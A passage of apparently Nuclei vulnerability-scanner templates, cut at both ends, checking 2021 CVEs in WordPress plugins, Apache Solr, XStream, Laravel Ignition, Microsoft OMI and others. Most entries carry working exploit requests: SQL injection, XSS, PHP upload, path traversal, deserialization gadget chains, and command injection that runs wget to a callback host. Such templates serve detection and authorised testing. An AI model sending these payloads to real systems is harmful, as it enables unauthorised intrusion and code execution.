/forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(6) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"asgarosforum\")"],"condition":"and"}]}]},{"id":"CVE-2021-24364","info":{"name":"WordPress Jannah Theme <5.4.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27850","info":{"name":"Apache Tapestry - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /assets/app/something/services/AppModule.class/ HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n","GET /assets/app/{{id}}/services/AppModule.class/ HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/java"]},{"type":"word","part":"body","words":["configuration","webtools"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["\\/assets\\/app\\/([a-z0-9]+)\\/services\\/AppMod"],"internal":true,"part":"header"}]}]},{"id":"CVE-2021-38647","info":{"name":"Microsoft Open Management Infrastructure - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wsman HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/soap+xml;charset=UTF-8\n\n<s:Envelope\n  xmlns:s=\"http://www.w3.org/2003/05/soap-envelope\"\n  xmlns:a=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\"\n  xmlns:n=\"http://schemas.xmlsoap.org/ws/2004/09/enumeration\"\n  xmlns:w=\"http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd\"\n  xmlns:xsi=\"http://www.w3.org/2001/XMLSchema\"\n  xmlns:h=\"http://schemas.microsoft.com/wbem/wsman/1/windows/shell\"\n  xmlns:p=\"http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd\">\n  <s:Header>\n    <a:To>HTTP://{{Hostname}}/wsman/</a:To>\n    <w:ResourceURI s:mustUnderstand=\"true\">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>\n    <a:ReplyTo>\n      <a:Address s:mustUnderstand=\"true\">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>\n    </a:ReplyTo>\n    <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>\n    <w:MaxEnvelopeSize s:mustUnderstand=\"true\">102400</w:MaxEnvelopeSize>\n    <a:MessageID>uuid:00B60932-CC01-0005-0000-000000010000</a:MessageID>\n    <w:OperationTimeout>PT1M30S</w:OperationTimeout>\n    <w:Locale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n    <p:DataLocale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n    <w:OptionSet s:mustUnderstand=\"true\"/>\n    <w:SelectorSet>\n      <w:Selector Name=\"__cimnamespace\">root/scx</w:Selector>\n    </w:SelectorSet>\n  </s:Header>\n  <s:Body>\n    <p:ExecuteScript_INPUT\n      xmlns:p=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\">\n      <p:Script>aWQ=</p:Script>\n      <p:Arguments/>\n      <p:timeout>0</p:timeout>\n      <p:b64encoded>true</p:b64encoded>\n    </p:ExecuteScript_INPUT>\n  </s:Body>\n</s:Envelope>\n"],"matchers":[{"type":"word","words":["<p:StdOut>","uid=0(root) gid=0(root) groups=0"],"condition":"and"}]}]},{"id":"CVE-2021-25299","info":{"name":"Nagios XI 5.7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&page=auth&debug=&pageopt=login&username={{username}}&password={{password}}&loginButton=\n","GET /nagiosxi/admin/sshterm.php?url=javascript:alert(document.domain) HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"iframe src=\\\"javascript:alert(document.domain)\") && contains(body_3, \"SSH Terminal\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=\"nsp\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-22502","info":{"name":"Micro Focus Operations Bridge Reporter - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /AdminService/urest/v1/LogonResource HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"userName\":\"something `wget {{interactsh-url}}`\",\"credential\":\"whatever\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http","dns"]},{"type":"word","part":"body","words":["An error occurred","AUTHENTICATION_FAILED"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-24452","info":{"name":"WordPress W3 Total Cache <2.1.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=w3tc_extensions&extension='-alert(document.domain)-' HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, 'extensions/\\'-alert(document.domain)-\\'') && contains(body_2, 'w3-total-cache')","contains(header_2, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2021-3374","info":{"name":"Rstudio Shiny Server <1.5.16 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2f/","{{BaseURL}}/sample-apps/hello/%2f/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of /"]},{"type":"regex","part":"body","regex":["[A-Za-z].*\\.R"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39501","info":{"name":"EyouCMS 1.5.4 Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?m=user&c=Users&a=logout&referurl=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2021-30049","info":{"name":"SysAid Technologies 20.3.64 b14 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/KeepAlive.jsp?stamp=16170297%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37589","info":{"name":"Virtua Software Cobranca <12R - Blind SQL Injection","severity":"high"},"requests":[{"raw":["POST /controller/origemdb.php?idselorigem=ATIVOS HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n","POST /controller/login.php?acao=autenticar HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\nidusuario='&idsenha=test&tipousr=Usuario\n","POST /controller/login.php?acao=autenticar HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\nidusuario=''&idsenha=a&tipousr=Usuario\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_3, \"Os parametros n\u00e3o est\u00e3o informados corretamente\")","contains(body_3, \"O CNPJ dos parametro n\u00e3o est\u00e1 informado corretamente\")"],"condition":"or"},{"type":"dsl","dsl":["status_code_2 == 500 && status_code_3 == 200"]}]}]},{"id":"CVE-2021-24236","info":{"name":"WordPress Imagements <=1.2.5 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-comments-post.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryIYl2Oz8ptq5OMtbU\n\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"comment\"\n\n{{randstr}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"author\"\n\n{{randstr}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"email\"\n\n{{randstr}}@email.com\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"url\"\n\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"checkbox\"\n\n\nyes\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"naam\"\n\n{{randstr}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"image\"; filename=\"{{php}}\"\nContent-Type: image/jpeg\n\n<?php echo 'CVE-2021-24236'; ?>\n\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"submit\"\n\nPost Comment\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"comment_post_ID\"\n\n{{post}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"comment_parent\"\n\n0\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU--\n","GET /wp-content/plugins/imagements/images/{{php}} HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"word","part":"body_2","words":["CVE-2021-24236"]}]}]},{"id":"CVE-2021-39141","info":{"name":"XStream 1.4.18  - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n  <unserializable-parents/>\n  <java.util.PriorityQueue>\n    <default>\n      <size>2</size>\n    </default>\n    <int>3</int>\n    <dynamic-proxy>\n      <interface>java.lang.Comparable</interface>\n      <handler class='com.sun.xml.internal.ws.client.sei.SEIStub'>\n        <owner/>\n        <managedObjectManagerClosed>false</managedObjectManagerClosed>\n        <databinding class='com.sun.xml.internal.ws.db.DatabindingImpl'>\n          <stubHandlers>\n            <entry>\n              <method>\n                <class>java.lang.Comparable</class>\n                <name>compareTo</name>\n                <parameter-types>\n                  <class>java.lang.Object</class>\n                </parameter-types>\n              </method>\n              <com.sun.xml.internal.ws.client.sei.StubHandler>\n                <bodyBuilder class='com.sun.xml.internal.ws.client.sei.BodyBuilder$DocLit'>\n                  <indices>\n                    <int>0</int>\n                  </indices>\n                  <getters>\n                    <com.sun.xml.internal.ws.client.sei.ValueGetter>PLAIN</com.sun.xml.internal.ws.client.sei.ValueGetter>\n                  </getters>\n                  <accessors>\n                    <com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>\n                      <val_-isJAXBElement>false</val_-isJAXBElement>\n                      <val_-getter class='com.sun.xml.internal.ws.spi.db.FieldGetter'>\n                        <type>int</type>\n                        <field>\n                          <name>hash</name>\n                          <clazz>java.lang.String</clazz>\n                        </field>\n                      </val_-getter>\n                      <val_-isListType>false</val_-isListType>\n                      <val_-n>\n                        <namespaceURI/>\n                        <localPart>hash</localPart>\n                        <prefix/>\n                      </val_-n>\n                      <val_-setter class='com.sun.xml.internal.ws.spi.db.MethodSetter'>\n                        <type>java.lang.String</type>\n                        <method>\n                          <class>javax.naming.InitialContext</class>\n                          <name>doLookup</name>\n                          <parameter-types>\n                            <class>java.lang.String</class>\n                          </parameter-types>\n                        </method>\n                      </val_-setter>\n                      <outer-class>\n                        <propertySetters>\n                          <entry>\n                            <string>serialPersistentFields</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>[Ljava.io.ObjectStreamField;</type>\n                              <field>\n                                <name>serialPersistentFields</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>CASE_INSENSITIVE_ORDER</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>java.util.Comparator</type>\n                              <field>\n                                <name>CASE_INSENSITIVE_ORDER</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>serialVersionUID</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>long</type>\n                              <field>\n                                <name>serialVersionUID</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>value</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>[C</type>\n                              <field>\n                                <name>value</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>hash</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>int</type>\n                              <field reference='../../../../../val_-getter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                        </propertySetters>\n                        <propertyGetters>\n                          <entry>\n                            <string>serialPersistentFields</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>[Ljava.io.ObjectStreamField;</type>\n                              <field reference='../../../../propertySetters/entry/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>CASE_INSENSITIVE_ORDER</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>java.util.Comparator</type>\n                              <field reference='../../../../propertySetters/entry[2]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>serialVersionUID</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>long</type>\n                              <field reference='../../../../propertySetters/entry[3]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>value</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>[C</type>\n                              <field reference='../../../../propertySetters/entry[4]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>hash</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter reference='../../../../val_-getter'/>\n                          </entry>\n                        </propertyGetters>\n                        <elementLocalNameCollision>false</elementLocalNameCollision>\n                        <contentClass>java.lang.String</contentClass>\n                        <elementDeclaredTypes/>\n                      </outer-class>\n                    </com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>\n                  </accessors>\n                  <wrapper>java.lang.Object</wrapper>\n                  <bindingContext class='com.sun.xml.internal.ws.db.glassfish.JAXBRIContextWrapper'/>\n                  <dynamicWrapper>false</dynamicWrapper>\n                </bodyBuilder>\n                <isOneWay>false</isOneWay>\n              </com.sun.xml.internal.ws.client.sei.StubHandler>\n            </entry>\n          </stubHandlers>\n          <clientConfig>false</clientConfig>\n        </databinding>\n        <methodHandlers>\n          <entry>\n            <method reference='../../../databinding/stubHandlers/entry/method'/>\n            <com.sun.xml.internal.ws.client.sei.SyncMethodHandler>\n              <owner reference='../../../..'/>\n              <method reference='../../../../databinding/stubHandlers/entry/method'/>\n              <isVoid>false</isVoid>\n              <isOneway>false</isOneway>\n            </com.sun.xml.internal.ws.client.sei.SyncMethodHandler>\n          </entry>\n        </methodHandlers>\n      </handler>\n    </dynamic-proxy>\n    <string>ldap://{{interactsh-url}}/#evil</string>\n  </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-27905","info":{"name":"Apache Solr <=8.8.1 - Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nConnection: close\n","GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://interact.sh HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nConnection: close\n"],"matchers":[{"type":"word","part":"body","words":["<str name=\"status\">OK</str>"]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2021-36748","info":{"name":"PrestaHome Blog for PrestaShop <1.7.8 - SQL Injection","severity":"high"},"requests":[{"raw":["GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1\nHost: {{Hostname}}\n","GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","status_code_2 == 404","contains(body_1, \"prestashop\")","contains(tolower(header_2), 'index.php?controller=404')","len(body_2) == 0"],"condition":"and"}]}]},{"id":"CVE-2021-42566","info":{"name":"myfactory FMS  -  Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25075","info":{"name":"WordPress Duplicate Page or Post <1.5.1 - Cross-Site Scripting","severity":"low"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\naction=wpdevart_duplicate_post_parametrs_save_in_db&title_prefix=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2fXSS%2f%29+p\n","GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["style=animation-name:rotation onanimationstart=alert(/XSS/) p","toplevel_page_wpda_duplicate_post_menu"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24278","info":{"name":"WordPress Contact Form 7 <2.3.4 - Arbitrary Nonce Generation","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin-ajax.php"],"body":"action=wpcf7r_get_nonce&param=wp_rest","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\"success\":true","\"nonce\":\"[a-f0-9]+\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["\"nonce\":\"[a-f0-9]+\""],"part":"body"}]}]},{"id":"CVE-2021-3129","info":{"name":"Laravel with Ignition <= v8.4.2 Debug Mode - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"AA\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=00=4F=00=33=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"phar://../storage/logs/laravel.log/test.txt\"}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups=","Illuminate"],"condition":"and"},{"type":"status","status":[500]}],"extractors":[{"type":"regex","regex":["(u|g)id=.*"]}]}]},{"id":"CVE-2021-21799","info":{"name":"Advantech R-SeeNet 2.4.12 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/telnet_form.php?hostname=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctitle%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Telnet </title><script>alert(document.domain)</script><title></title>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24970","info":{"name":"WordPress All-In-One Video Gallery <2.5.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=all-in-one-video-gallery&tab=..%2F..%2F..%2F..%2F..%2Findex  HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"All-in-One Video Gallery\")","contains(body_2, \"Hello world!\")","contains(body_2, \"Welcome to WordPress\")"],"condition":"and"}]}]},{"id":"CVE-2021-42663","info":{"name":"Sourcecodester Online Event Booking and Reservation System 2.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pwd={{password}}\n","GET /views/index.php?msg=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</i><script>alert(document.domain)</script></div>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33544","info":{"name":"Geutebruck - Remote Command Injection","severity":"high"},"requests":[{"raw":["GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{{interactsh-url}})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-44528","info":{"name":"Open Redirect in Host Authorization Middleware","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-Host: 